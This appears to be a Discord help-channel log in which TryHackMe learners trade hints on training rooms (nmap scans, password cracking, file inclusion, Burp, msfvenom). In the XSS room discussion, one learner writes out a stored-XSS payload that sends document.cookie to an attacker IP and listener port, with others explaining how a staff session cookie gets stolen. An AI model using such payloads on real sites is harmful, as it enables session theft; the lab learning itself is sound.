#room-hints

is the command i ran

the only clue i got was when i googled the answer

https://mohomedarfath.medium.com/nmap-tryhackme-room-level-7-level-15-297804d37e1e

it must be an old post but the wuestion asked to scan the first 10000 ports

and he has a screen shot of what he got, it was 5 ports open

it was 5000 in the actuall command sry

not used to the keyboard im using

i actually scanned 10000 ports also

think maybe it was a typo of some sort

still only 1 open port 53

Ok im scanning now.

Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-02 16:11 EST
Initiating Parallel DNS resolution of 1 host. at 16:11
Completed Parallel DNS resolution of 1 host. at 16:11, 12.12s elapsed
Initiating SYN Stealth Scan at 16:11
Scanning 10.10.42.134 [65535 ports]
Discovered open port 53/tcp on 10.10.42.134
SYN Stealth Scan Timing: About 4.23% done; ETC: 16:23 (0:11:42 remaining)
SYN Stealth Scan Timing: About 11.94% done; ETC: 16:19 (0:07:30 remaining)
SYN Stealth Scan Timing: About 25.25% done; ETC: 16:17 (0:04:29 remaining)
SYN Stealth Scan Timing: About 45.26% done; ETC: 16:15 (0:02:26 remaining)
SYN Stealth Scan Timing: About 60.92% done; ETC: 16:15 (0:01:37 remaining)
SYN Stealth Scan Timing: About 74.18% done; ETC: 16:15 (0:01:03 remaining)
SYN Stealth Scan Timing: About 84.84% done; ETC: 16:15 (0:00:38 remaining)
Completed SYN Stealth Scan at 16:15, 258.09s elapsed (65535 total ports)
Nmap scan report for 10.10.42.134
Host is up, received user-set (0.017s latency).
Scanned at 2022-02-02 16:11:20 EST for 258s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 270.32 seconds
Raw packets sent: 131253 (5.775MB) | Rcvd: 175 (7.700KB)

all ports scnned

yea

@white salmon I found my mistake. I traced my file path and corrected it. Thanks for your help.

Gave +1 Rep to @dusk totem

okay, I'm going to do that now

@white salmon It was. For some reason it wouldn't go though the zip file.

Yeah, I did the same thing. @drifting plinth Read the last part of Task 2. If you look at my last post regarding it, I explain how to create that valid_usernames.txt file

@arctic spindle, @white salmon Yup. so moving on to Logic Flaw. Thanks again.

@drifting plinth Not a problem, have a good one 🙂

@white salmon scanned the first 5000 ports same output

Okay, I need that confirmation. I felt stupid for over an hour. Thanks!!

Is there anywhere i can report it?

I don't think it's a bug in the machine.

What exact command did you run?

Hey sorry just saw your message. sudo nmap -p 1-5000 -sS 10.10.42.134 -vv -Pn

but I wasn't the only one that tryed.

Hi all. Anyone around familiar with the first Network Services room? I'm having trouble with the last question.

Hey guys! I am having an issue getting the flag in Task 8 in this room https://tryhackme.com/room/xssgi

I created a ticket with the payload and I am listening for the Cookie using nc but I am not receiving anything.

This is what everything looks like

So I thought there was an issue with my listener and I used the THM request catcher, but all I got so far is a DNS request.

Alright I reset the box and all is working now. 😛

The flag?

hi guys i'm stuck with password attacks room: https://tryhackme.com/room/passwordattacks
task 9
i've already generated the password wordlist with john using the format written in the hint box, but it doesn't works, can anyone help me?

I'm trying to do remote file inclusion and have started a python http server but it's not working when I try to access it.

you haven't mentioned which file you wanna curl

ohhh I see what's wrong

got it now, thanks. I wasn't paying attention lol

room: https://tryhackme.com/room/sqlinjectionlm
task 8

i'm struggling to get this to delay, i even copied the example and it's not giving a delay

which task is that?

I'm a little lost on the syntax of 10 10 10 10 little help?

I'm doing the beginner tryhackme course

It's an ip.

Is it asking for the syntax to ping it?

8

task 4 what is networking

i see what i missed

can anyone tell me if the box "relevant" requires bruteforcing?

Can anyone give me a hint for the room plunk 3, task 3, question 8?
I think I've identified the OS edition ||Microsoft Windows 10 Enterprise||
But I don't know to get the FQDN from there. I've tried searching for hostname but get too many results for the associated host.

Need help with Splunk 2 I am trying not to cheat the answer I want to actually fin dit

Have you done Splunk 2 yet?

Having trouble with mission 22 on Linux Agency... has anyone completed this?

||I've tried exit() and CTRL+D and CTRL+C to "escape the snakes"... what am I missing here?||

@dim wasp @hollow swan

boo... ended up reading a write-up for this one. Not the best hint fwiw.

hey guys I'm in the new burpsuite: the Basics, task 13. Can someone give me a hint on how to find the flag? I've put all the links from the homepage through burpsuite, but I cant see anything on the sitemap

I'll take a look

||example/sitemap.xml not working?||

It's been a while since I did that room

||or spider using a wordlist like big.txt if you're trying to stick with using Burp only||

nvm, I see what it's asking you to do

explore manually then check sitemap in Burp. Make sure you are using it as a proxy

sitemap is under target tab... just check back there after you look at the entire site. Again, make sure you are using Burp as a proxy

Thanks 🙂

yw

Is there a bug in the pyramid of pain room or am I just dumb and can't get the flag?

yeah I think there's something wrong with that room

If you think there's a bug, just post it in #room-bugs 🙂

Already, I just wanted to confirm it.
After 1 hour of tinkering I confirmed it

Cool beans

helllooo

hi
i am stucked in a room jokerctf
The question is
At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?
and from the hint i got this as a reference
Maybe burp with format user:pass and encode with base64? Note: Don't forget decode it!!

link?

Dm me if you are still stuck

Thank you, I'll reach out if I run into a wall again.

Hello, im stuck in the room Ice, on task 4 it asks me Q6Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit? But when I run the run post/multi/recon/local_exploit_suggester in my meterpreter session, I get the output ```meterpreter > run post/multi/recon/local_exploit_suggester

[] 10.10.84.200 - Collecting local exploits for x86/windows...
[] 10.10.84.200 - 4 exploit checks are being tried...
[+] 10.10.84.200 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
meterpreter > I did answerexploit/windows/local/ms10_092_schelevator```Which is not the answer, I've tried terminating and doing the machine again but i get the same output. Am I doing something wrong here?

Hi I am doing one easy challange and cant complete one task which is read flag for wayback machine, and i cant see the flag page i have exact link and timestamp right, can someone confirm?

https://web.archive.org/web/20200102131252/https://www.embeddedhacker.com/

on right side click on THM flag if you can read it because i can't

hi,
In the room Pyramid Of Pain, I'm bloqued here:
Any help? got no idea

Hi everyone. Room Initial Access - Password attack, stuck here. Someone could tell me what's wrong in my syntax?

hashcat -m (md5 format) hash.txt rockyou.txt
and if u want, hashcat -h | grep MD5 to make research easy

Thank you ! 🙂

Almost everything about this malware is here https://www.joesandbox.com/analysis/302663/1/html but the question is buggy as the document related to the malware is an 8 digit document and not a 10 digit besides having a word before it. By the way it is Q4 repeated.

Thx @worthy marten

Gave +1 Rep to @worthy marten

Il faut Tag le nom pour les remerciements frero 😉

Hi, did you find an answer to task 5 Q4 in Pyramid of Pain, would appreciate a hint 😀

No , i gave up, its clearly bugged or illogic answer

Thx @serene cave

Gave +1 Rep to @serene cave

mmm, OK, I see, I think then I have an answer, but it won't accept it.

Pyramid of Pain task 5 Q4 done, definitely a crazy OSINT journey...

hi I am in Room OWASP Top 10
Task 20 [Severity 7] Cross-site Scripting

When I enter some of my own html, it allways gives me Proplem loading page

a new tap wont connect to the machine anymore

when I restart firefox it simply hangs when trying to connect to the machine

any help on that?

and the flag for the document cookies isn´t accepted as answer ?!? 😟

Are you on your own machine or the attackbox ?

own vm

If you check ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc. ?

i think everything with the vpn etc is ok

it´s just that when i enter some html it wont connect anymore to the website of the task

i need to terminate the machine of the room and start it again....

I mean the task inserting html on the xss stored area

Well, maybe it is, but before trying anything else I would like to be sure there is nothing wrong with the vpn, as somewhat it sounds like an issue with it. So if you could check what I asked you for, I would appreciate it 🙂

And openvpn is only running inside your VM and not on your host machine as well ?

yes. every works until I do what the task wants, entering some html into the comment field

Can I try that on my own on your target machine ? If yes, let me have the IP and which question of that task you are doing

just a sec... I just went on to the next task...will restart again and then make it crash again

10.10.27.87

someone able to give a small push for pyramide of pain task 5 Q4

Could you show me a screenshot of the "Active machine information" box for that task ?

And again, which question for that task are you doing? And what exactly have you entered on the target machine page?

anyone got any idea how to solve the pyramid of pain task 5 Q4?

im stuck there

me to 🙂

Q: Then add a comment and see if you can insert some of your own HTML.

<html>

<head>
<title>write example</title>

<script>
function newContent() {
alert("load new content");
document.open();
document.write("<h1>Raus mit dem Alten - rein mit dem Neuen!</h1>");
document.close();
}
</script>
</head>

<body onload="newContent();">
<p>originaler Dokumenten-Inhalt</p>
</body>

</html>

I just copied that to try...but the response of the machine seems to be incredibly..😆
I mean the machine isn´t to reach afterwards anymore

a comment in html looks like <!-- hello astroloop -->
(Maybe im out of scope) share us your room, and the number of the task u need help @woeful maple

any hint? lots of people (me included) are bloqued here

Room OWASP Top 10
Task 20 [Severity 7] Cross-site Scripting

well, i justed pasted some of internet.
machine isn´t reachable anymore
Am I a hacker now? 😉 😅

Yes, what do you need help with?

Oh I figured it out I had found the wrong directory

Hey everyone, I am starting my journey with THM and am having some issues with Walking An Application. I was curious if someone could help me out. I am stuck on the last two steps of Task 3 - Viewing The Page Source. I don't understand what exactly I am supposed to do.

Heya, Pyramid of Pain task5 Q4 - this is asking for the name of the file the user interacted with (or as worded in the task, i.e., "...name of the malicious document...") and which resulted in the binaries/executable seen in the task image. The answer came for me quickly only after finally moving to Google and away from performing the hash lookups in Duckduckgo (which returned plenty of hits and a rabbit warren ensued). For ages I refused to check the hint and should have early on I guess. Google returns fewer more manageable hits, and one of those gives the answer. The masked answer format for Q4 is correct.

Does someone have a hint for https://tryhackme.com/room/pyramidofpainax task7 / 2nd question? Found several alternative names, but none of them are the resolution. I checked ssdeep website, but... nothing...

delete the word "computing" and you got your answer

ok, thx 🙂

Gave +1 Rep to @serene cave

Anyone here have an idea? (am I just doing it wrong??)
#general message

hey, fam a lamb. having an issue with the JR pentest path. metasploit exploit room, something is up when i execute this msfvenom script that i made.

something about segmentation

yes the rev tcp i made i eventually named 'poop' because after the 15th attempt i was miffed

Make sure the payload you use for your listener/handler matches the payload you used for generating the .elf executable

yeah ive made that mistake and it gives a different complaint

'segmentation fault core dumped' i googled and they said it had to do with memory and permissions?

but i'm root when executing the .elf..maybe it can't be executed in my current location???

Well, as I said, that most likely is due to different payloads that you are using

Try to check the system architecture, x86_64 or x86

What payload did you use to generate the .elf file ?

Ah nvm I can see it, so then just show me what payload you are using within handler ?

look at the pic. /x86/meterpreter/rev_tcp

ah this is from last night. after i spent too long on it

Yes, I saw it, but I can't see the payload for your handler, so maybe show me a screenshot of that too

ill redo it and check that the handler and payload match

i'm going to reattempt this afternoon. i'll make sure everything matches

thanks fontaene

thanks infloop

no rep? here +rep @left thunder @sturdy hearth

Gave +1 Rep to @left thunder

sorry infloop, raincheck

No no, it's ok👍

hey guys, I am doing the module "Network Services 2" and I'm stuck in the task Exploiting MySQL, at the point where I am supposed to crack the hash from the SQL-DB with john the ripper. For some reason the machine I started (Kali) does not let me run john the ripper by "john hash.txt". I had to use the kali machine instead of the "AttackMachine", as on the attack machine was no sql installed and I couldn't install it manually. Any ideas? 🙂

ah well, I figured it out, fault was on my side. I tried to start it without sudoing the command, arrghhh 😊

Thanks 🙂

X_X Pyramid of Pain task 5Q4 is farking EVIL. Took me nearly 2 hours of researching the topic to find the particular vector being asked for ... I found hundreds of vector files, but the one being looked for is associated to the specific Anyrun in the tasks screenshots.

How would i go about enumerating the MTA type for an SMTP in Metasploit? I already know the answer but i deduced it from the hint...is there any way to know what it is through some sort of command?

Hello anyone to talk about Holo network ?

#holo-network would be the place to ask!

Just asked there once I saw it ahah

Please give ma a hint for https://tryhackme.com/room/pyramidofpainax task 5 question 4. I can't find anything

Search the chat history for "Pyramid" a couple big clues dropped in the last 48 hours.

I tried to use this clues but still can't find anything

Yup, but for this malware there a lot of reports on Anyrun and I can't find the correct one

Thanks, its a good hint

Gave +1 Rep to @burnt rivet

In Task 2 of Windows PrivEsc, I try to run "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .", but I get "No such file or directory". Any idea why python3-impacket is not visible in the /usr/share/doc/ directory?

install it first dude
https://github.com/SecureAuthCorp/impacket

hi guys, I'm doing AoC3 day 10 and I can't seem to find usage of port 20212 (which service)

can you help me?

nvm I went too far with scanning

hi everyone, I was just working on the Windows Event Log room and noticed that there two questions that don't agree with the normal formatting I know. Task 7 - computer name and Group Security ID... the computer name is in format I haven't seen [4].[7].[4] as opposed to DESKTOP-XXXX or WIN-XXXXXX. The Group Security ID also doesn't seem to match what I think is the answer. What am I missing?

No, that doesn't work on the virtual machine.

What? Impacket work on virtual machine dude

make sure you're install like the instruction

Good morning all, I need some help here and am feeling a little dumb, this is the beginning of my journey into cyber security, but to the point. I am in the regular expressions room and stuck on how to match every possible IPv4 IP address using metacharacters groups. Now I am not looking for an answer as I could have looked online for that just a few nudges in the right direction on how to look at this. I am looking at the answer format for help a little on how it should be layed out but just drawing a blank. Please and thank you.

(\d{1,3}.){4} this is what I've got so far

(\d{1,3}.){4}++{+,+} the rest should look like this, I used + because using a * makes it italics

Hi everybody ! I'm on the POLOTELNET learning machine, but i get no open ports is it normal?
I think maybe it's an issue but i'm a complet beginner x)

I get this with Kali --> All 8320 scanned ports on ip-10-10-187-203.eu-west-1.compute.internal (10.10.187.203) are closed

https://tryhackme.com/room/networkservices# - Task 6 Enumerating Telnet ^^
Ok 🤔 Sorry for this ^^'

nmap -A <ip> and many others xD

yes i got it... Sorry 😓

use -p-

Really thanks for help! 😉

"Now re-run the nmap scan, without the -p- tag, how many ports show up as open?"

1000 common ports will show

that default nmap scan

like Iassi said

I need only to read more... xD
"Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage. "

Hello everyone. Can anyone please help me with the following problem- In "Introduction to Django", it says me to install Django. But where do I install it? In the attackbox?

If you are using the attackbox, then yes

okay, going through https://tryhackme.com/room/fileinc
I'm on Task 8: Challenge, needing to capture flag 3 from /etc/flag3
However, I cannot figure out how to exploit this step, reading the docs for ||$_REQUESTS|| didn't help
If someone has a hint, it would be greatly appreciated

note, this is a subscriber room

Have you tried using double forward slashes and quadruple dots with %00 at the end

I have, it filters out any characters not a-z0-9

Is that the one with burp?

no, it's about LFI and RFI

Yeah.

I used burp.

Changed a few parameters

Did a few ../../ etc and got it

I have a feeling there is a better way to do it, since burp was never stated to get it

Tried url encoding?

There is many ways to do things.

that would be me editing the url in the address bar correct?
That doesn't work either

No no

Search url encoder online

It converts dots to %2f and all that

any hex and such in the search bar are filtered, and attempting to change it in the address bar give the same issue

Have you checked network tab in web developer tools for js scripts

Though it'd only work for client side filters

I have, haven't seen anything useful

although I might be missing something

If all else fails, then you're pretty much left with modifying the request in burp/repeater

I've got burp loading now, Hoping I wouldn't have to use it

a

oh?

I've tried POST and GET, no idea how else I would start to go about that

I mean, I'm used to using dev tools anywya

I might have to, I'll look for a few more minutes first

Thank to lassi, I finally completed it!

No, as I said already "python3-impacket" is not listed in the /usr/share/doc/ directory. And even when I tried to install it with that Github repository, it did not work. Also I'm talking about the virtual machine built into the browser for the TryHackMe site, not an external VM like Oracle VirtualBox or anything like that.

What is the very first CVE found in the VLC media player? ||CVE-2007-01-02||

I know this is a simple question but I found the first CVE in the terminal however it says it's incorrect

I even went all the way back to the first Exploit for VLC and that didnt work after trying dozens of CVE Im beyond frustrated

which room was this in? @karmic timber

sort by date, check the oldest, click on it and check the CVE, the answer format is the same as the rest of them CVE-XXXX-XXXX

Intro to research

VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)

I already tried this one and Im sure this is what its refering too

but the CVE isnt working

Copy this

And search on google

Make sure you need to add CVE-

Okay for some reason doing this way gave me the correct CVE, I was using the correct format

I was searching ExploitDB but it was giving me a different CVE

No

Idk why it different

Should be the same

Yes

Okay, Perhaps I need a full class in using ExploitDB

Just search like this Name + version

I came over from HTB because it was kind of difficult trying to guess answers and losing connection. I hope this is a better platform

Thanks for the speedy help

Tryhackme is the best platform 🙂

Perhaps I need to subscribe than

https://www.exploit-db.com/exploits/3069

Yes

that is

and you need to add the CVE- for the correct answer

It accepted the answer

There're many free room

#start-here for more info

!docs free-room

oh

!docs

!docs free-path

here :)

There is a lot more free stuff than I previously presumed

thanks I bookmarked it, I am on the right path it seems

@iron wigeon Do you think its more beneficial to jump right into the paid stuff?

or should I complete the free stuff firstly?

If me, i will do both subs and free rooms

and this is up to you

are there walkthroughs in the paid version?

yep

for the free rooms as well?

yes

all the rooms are having walkthoughs

okay and when you pay you get extra features and acess?

on googles, tryhackme etc...

yes

okay, sounds like a pretty good deal

for more infomation about that, you can go to profile and see on Subsciber

so premium gives me full access to everything?

Like 80% of the rooms are free, you can learn a ton before needing needing to subscribe, depending how fast you fly through the rooms and how fast you can absorb knowledge it could take months before needing a subscription.

Okay, sounds like I have my work cut out for me

with free materials

one thing I noticed is that you might get a few free sectors from each module but I want to be able to complete the entire module at once

!docs

!docs url

!docs api

pyramid

that's the thm staff person "nanaisu | fluffs dearest"

Gave +1 Rep to @cedar anvil

summoned

I don't think that's necessary

you need to be a bit more verbose

look, I can't really give you advice on how to proceed without knowing exactly what you've tried, what you haven't tried, etc.
My suggestion is to go read a writeup.

lol

take it slow old man XD

sorry, but I'm kinda in the middle of working right now, I don't really have time

hey! someone did the firewall room ?

I can't get the answer for this question:
You need to allow SNMP over SSH, snmpssh. Which port should be permitted?

Anybody here that could help me out? I'm dealing with another room where the youtube tutorial isn
Is not up to date and the written instructions are not working in the module
Linux Fundamentals Part 1

@civic escarp follow the link provided and search for snmpssh. Scroll down a bit for the search bar on website.

Yeah thnx bro :)

File Inclusion room, task 8. I can't seem to gat flag 1. I have tried modify the GET to POST from the browser, curl, burp. Tried various combos of ../../etc/flag1, the server always sends the same payload back.

What part?

Someone completed Gallery room? I'm stuck at privesc, any hints?

#941770664476565574

but it should have shown you the result while doing from burp when you changed from get to post

specify the task and ques you want to ask

I was able to get it, had to change the content-type to application/x-www-form-urlencoded.

oh ok

Hi, in room Firewalls. Hi. In task 1 Question 4 what is the port for SNMP over SSH, snmpssh???
I cant find it

In ccpentesting room final exam (https://tryhackme.com/room/ccpentesting)

I used gobuster to find the secret.txt file, I used john the ripper to crack the hash, logged into the using nyan, and found the user.txt file, however I can't manage to find the root.txt file, I'm assuming it's under /root but I dont have permission to enter that folder, any lead please?

Not really

I'll skip this one for now then

Im doing the overpass challenge and im trying to get the root flag the only thing is when i setup my python3 server and nc listener i keep getting 404 not found?

I put my ip as overpass.thm

And created a dir caled downloads/src/buildscript.sh

I chmod +x

I still get the 404

I put the ip in /etc/hosts, but i just get a 404 not found from the server

The overpass.thm

You wanna know what i hate... its as soon as i ask for help i get it...

Time for the boring part making a report lmao

Anyone else working on firewalls room?

Ping me if you submit it as a writeup to the room, I've been slacking on reviewing them recently

Alright man thabk yoy

how do i know which one stands out theirs so many and they all stand out imo

Scan your own system and see which ones pop up, cross match and see which ones you don’t see on your own system

If there are multiple, google the services and see which one stands out the most

okay now im trying to use netcat to remote into it but when it listens in and i upload the .phtml file it doesnt find anythign

it worked the first time but i messed up and ctrl c'ed the wroong terminal

okay nvm i got in

Sorry for the delayed response,

I'm following the complete beginner path, is the chronological order not that important?

@latent pulsar you see it in a comment at the end of /sev-home

Someone please help: i got stuck on cybercrafted room. I got the reverse shell, got the id_rsa, the users name (xx........xx) i cracked the rsa keys password (c......6) i got the user's password (d.........9) and i can't get in with these. Earlier i could get in, and start to get the last flags, but now nothing works, every time is restart the room, i get the same passwords wich don't even work. Please help in PM.

Can someone help me with the XSS room under Jr pentesting. Im on the last section telling me to grab a cookie using a brekout in a ticket submission form. I can brek out and get the cookie im looking for on my nc listener. but base64 decoding it comes up with, never the right answer

This is due to you probably open that ticket on your own, therefore you only receive your own session cookie, but you need the staff session cookie, which you will receive when the automation behind it gets triggered and opens the ticket as staff

YES, when it comed back decoded its "session=kajshdfgaskjhdbfkasjhd" not "staf-session"

Well the staff session cookie will look the same, but just has a different value

so what would i put in the payload to specify the staff session cookie?

oh

Nothing differently, you have to understand what is happening, whoever open that ticket in his browser, will get his session cookie "stolen" and send to you.

so i have to open the ticket, or someone does. logged in as staff?

As I said, whoever is opening that ticket will get his session cookie send to you. So as you want the session cookie of a staff member, you have to wait until a staff member opens that ticket in his browser. This room is build with an automation behind it, that will open that ticket as a staff member after a minute or so, all you have to do is wait for that

If it's not getting triggered after 2 - 3 min and you sure your payload should work, restart the target machine and try again, or use the request catcher

ok, i see. Thanks so much for actually taking the time out to help xD ill give it a shot

Gave +1 Rep to @left thunder

so im not clicking the ticket i made, just waiting and listening. Fresh box. 4 minutes now and no requests

Then try the request catcher with a fresh machine

the nc listening?

listener*

No, the request catcher which can be found at http://10.10.10.100/

oh yeah that thing NEVER worked, even grabbing my session cookie

Well then I assume you used a bad payload or a wrong address of the request catcher

Show me the payload you are using for the request catcher pls

on the catcher you dont use 10.10.10.100 huh?

you use the URL they provide on the site?

Ye, you create a new session for your request catcher at 10.10.10.100 which then provides you with a unique url

"</textarea><script>fetch('10.13.15.42:9999?cookie=' + btoa(document.cookie) );</script>" " this is what im using now.....chaning it to "</textarea><script>fetch('c44ecbd333d0bda91623c8c37d65dae0.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

Wait, you have removed the http:// part in your payload, for both your attacking machine and request catcher

i guess i need that hu

Yep

ok giving it a shot on my nc again with the http

Also I suggest restarting the machine again once you used that bad payload, as this machine is a bit finicky when providing bad payloads ^^

roger

"</textarea><script>fetch('http://10.13.15.42:9999?cookie=' + btoa(document.cookie) );</script>" new payload, new machine wish me luck

no luck at all lmfao

if i click the ticket, i grab my cookie so i know its working

Hey I dont get the question "When will the crontab on the deployed instance (10.10.167.49) run?" of linuxfundamentalspart3?

Ok, well then I guess use the request catcher, you could try to create a new ticket with it right away, or the more reliable approach to restart the target machine again and then create the ticket with the request catcher url

Did you check crontab -e ?

yes

Okay, so the answer is right there 🙂

huh

but there are only # lines

But not in the last line

then it runs on reboot?

ow lol I'm dumb

thnx

You are welcome

well i got response from the thm reuqtest catcher, but it was a dns request and then waited 5 mins and nothing, im gunna go to a different room and come back to it. Seems i am terrible with xss

Thanks as always, you put in more effort than anyone else lol

Gave +1 Rep to @left thunder

how do you get rep?

When someone thanks you.

So when someone direct replies, or mentions your @west magnet with the word it will add rep.

so i'm working on offensive pentesting. I am new to this so i could just be completely dumb, and i accept that. In the vulnerability module uner reconnaissance, it asks for the port the web server is running on. I watched the video and it shows 3333, i entered 3333 and it worked. I can not find a web server running on port 3333 when i scan the system. I did nmap -p- SystemIP, I tried just searching port 3333 with nmap -p 3333 SystemIP. Specifying the port tells me the port is closed. idk what i am doing wrong. any help is greatly appreciated.

@dreamy orchid Are you scanning from the attackbox?

@umbral umbra yeah i was in the box, ran the nmap and scanned the ip specified at the top of the machine

at the top of what machine?

can you post a screenshot of the command you used?

yeah

you'll need to verify first

!docs verify

i am probably doing something wrong i just can't figure out what

You are scanning the wrong IP, you scan the attackbox instead of the target machine

that will certainly do it

i'm dumb. totally forgot you have to start your attack machine and the other machine which is at the beginning of the lesson...

Happens

at least i had the commands right... lol. thanks for the help really appreciate it!

Anyone know why kerbrute would return 0 usernames in attacktivedirectory?

Never mind. Had to add the IP to /etc/hosts

Someone can help me with this room?

can you specify cookies in curl requests?

nvm i think i just answered my own question >.>

I need help in a question What was the original target of Stuxnet?

This is the room

Did you read the hint ?

I read the task multiple time

yes I did

it says read article

Then read the article.

I did

It will tell you who was the intended target.

123 1234 1234567 123456789

It says "Read the case study", which is included in the task, you have to unfold it

This is the answer pattern and nothing matches with it

The answer can be found within the task itself

No, there was specific target.

It is done

I read again and the answer was in front of me

😄

XD

Stuxnet was VERY effective.

Look it up.

Yeah

I need to edit this script so it'll accept my file, how do I edit the script inside the js file before it loads?

can you not just delete said lines in the request to make it not load the js???

I tried deleting the line, but it contains the script what to do incase the file is valid, when you delete it, it does nothing when you click upload

Try intercepting the response of the request in Burp.
Or capture the js file with Burp to do so edit your settings in Proxy - Options - Intercept Client Requests
Remove: |^js$|

I did edit the options and removed |^js$

Great, did you captures the js file now? Otherwise try reloading without cache Ctrl+F5

the screenshot I uploaded was after removing the options

Should the file appear somewhere else?

will watch how i did it moment

Task 7 you are i think:
Gobuster would be a very good place to start here -- the upload directory name will be changing with every new challenge.

the folder name is Assets

but how did you edit the js script?

By capturing the js file but sometimes when you first loaded the site the js file is already cached. Then you can't edit and you need to reload the page with Ctrl+F5.
Then in the proxy tab in Burp forward the others and look if the filter.js file comes by.

Ctrl+F5 in the browser?

yeah

I tried that, it doesnt work :/

after I update the options tab, do I need to save it somewhere?

proxy on, Ctrl+F5 reload page then everythong goes to your proxy also the js file

then forward the nonsense and edit the js file

Ohh I get it now! I didn't notice I was intercepting the wrong GET request

Intercepting the right GET request for the js file did it

Thanks @thorny thunder

Gave +1 Rep to @thorny thunder

im doing the overpass challenge and im trying to get the root flag when i set up the python3 server for port 80 it say address in use, am i missing something?

if one port is already used by some service, you cannot use it for other service. you need to kill that service or use some other port. Always use unregistered ports like 5678, 8080 etc. Those always work

FYI: check pin message on #site-support which ports you can't use on attackbox

Hello

hint: it holds a lot of info, messages and more.

@azure hound

Gave +1 Rep to @earnest charm

you're welcome

❤️

might want to delete the message with the correct answer

or hide them with || around the words

done! thanks ❤️

@patent musk

I'll help you out here.

also, what room are you doing?

a

נקעןמ

wut

begin

bug wtf

what?

Learning Cyber Security

Get a short introduction to a few of the security topics you'll be learning about.

ohkay??

to begin with, what room are you doing?

view site

smh

what is the name of the room you are doing?

i no know how found username ... its my problem

for me to help you, I need to know what room you are doing to be on the same page

send friend

i have image

for you for see

!docs verify

you can verify yourself and share a screenshot here.

oh ok (:

😄

Oh he have asked the same question on #room-help :D

huh

interesting

yeah but i no see usernames

I said look at the URL 🙂

the bookface.com/...

John, do you know what room he is talking about?

It have some highlight

wait i verify to see you

ngm

got it

alrighty Larry

let's get you sorted out here

did you click the view site button?

yeah

okay, did you see something like this?

yes

do you see the little finger?

It's Learning Cyber Security

pointing right?

yeah, already on helping him out 😄

@patent musk

i know i end this

Sorry for delay reply :)

did you click on it?

i no know how found an user i got url

if i end the site yes

sorry, I don't understand

i in bookface

yeah good

did you click on that little finger?

send image if its bookface?

yes

do you see a page like this?

Why this got blur?

Or i got lag?

I added it

yes

that's where you can find the answer

okay, take a close look at the URL

you'll find the username

How you can add it @.@

ok

ez, use greenshot

but i in bookface i no know how find user

yeah! that's THM's vulnerable social media platform haha

take a very close at the URL 👀

Oh i see, thanks :)

Gave +1 Rep to @woven mortar

that URL

@patent musk

oh

did you find the username?

wait

sure

can you send link for bookface of image i no know if is it beacuse i no find nothing only music...

what are you even talking about?

please verify yourself and share a screenshot

so I can understand your problem better

put it there

DM it to the bot

oh i need to change server privalcy

oh ok thanks

its bookface?

oh my god

not there

just click on that button in the room

EXACTLY!

and put on google?

you got it!

NO

you don't do that

I can see the Username

you should too

and that is THM's vulnerable site

it's their sandbox environment

for you to learn

so, no putting stuff into google

ok what i do with this?

you answer the questions....

oh thanks

aye

bye thanks

happy to help 😄

really ? i so stupid of this lol

How much did the data breach cost Target?

how i will know it?

know what?

you have to complete the challenges and answer the questions

no i no know what how i found it

and i no know what is the question?

kb 880 r for example

oh no sorry

Folllow the lesson steps in the sequence, watch the video and you will figure it out.

Nmap Live Host discovery on Task 5. When I try to input that Text in the Data field, I get an error saying its invalid. Can I get some Pointers of what I'm missing?

Can I have the room URL pl0x?

https://tryhackme.com/room/nmap01

What text in which data field? Maybe verify so you can send screenshots, that's making things much easier

!docs verify

@left thunder Just to confirm. This token is in Dev tools?

No, did you not saw the link I posted? It's explaining you how to verify. But here you have it again: https://help.tryhackme.com/community/discord

I think they might be referring to the token from the THM site that you have to supply for verification

Hi there. The WebGramming task3 and task9 are left. Anyone can help?? I am so grateful.

doing Game Zone atm. Can someon explain my why ' or 1=1 -- - works, but ' or 1=1 -- doesn't

I found mysql documentation about comments, but wanted "deeper" explanation. This is gold - Thank you!

Working on the "battery" room, I need a hint : Is ||xxe|| a rabit hole ? Because the ||expect module|| doesn't seem to be loaded, making ||rce|| impossible... Thank you for any help 😉

anyone able to give a hint for pickle rick?

so far tried nmap with scripts (only getting 80 and 22), tried gobuster (got nothing except assets), tried SSHing in as R1ckRul3s but get permission denied pubkey, tried a couple other usernames in SSH

also tried looking for open UDP ports

@teal osprey When you used gobuster, did you only look for directories? or also files as well 😉

hmmm... thanks let me try 🙂

aghhh -- feel so stupid. Thanks for the help lassi and unlooki

np, gl finishing the ctf

Hello everybody, i'm facing a issue during learning https://tryhackme.com/room/rpburpsuite.

I'm stuck when dealing with instruction "We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header. "

When i send a response with a Set-Cookie header in Burp Sequencer

And i analyse entropy after 10.000 requests, I only have an entropy of ~80

This question "
Parse through the results. What is the effective estimated entropy measured in?" expects an entropy between 1000 and 9999

Can anyone helps me pls 😉 ?

I think I also had that bug a while back, I'm not sure what I did, but I think restarting burp solved it for me

got the "hint" looking at a writeup...

It's weird because only requests sent to path socket.io give me result with Set-Cookie header

All other Path of Juice Shop doesn't give me this header

I remember it have

I tried to restart burp , THM VM but still the same issue

When accepting cookies pop-up in web page, no request are sent, is that normal ?

For easy to know, can you send screenshot?

There is the pop-up

Burpsuite Basic or Owasp juiceshop rooms?

Just find more down

Burpsuite basic https://tryhackme.com/room/rpburpsuite

I don't understand what you want

Hey what is the question?

I mean try to find in more #...

If i remember where it's in 35+?

...

The question is Parse through the results. What is the effective estimated entropy measured in?

It wants to have a response with the "Set-Cookies" header in

Pass this request in Sequencer to estimate the entropy of it

When i pass all requests that have this header in Sequencer, i have entropy like ~80

But the question expects an entropy with 4 number (example: 5236)

If you read clearly

You can see it? Password reset tokens (sent with password resets that in theory uniquely tie users with their password reset requests)

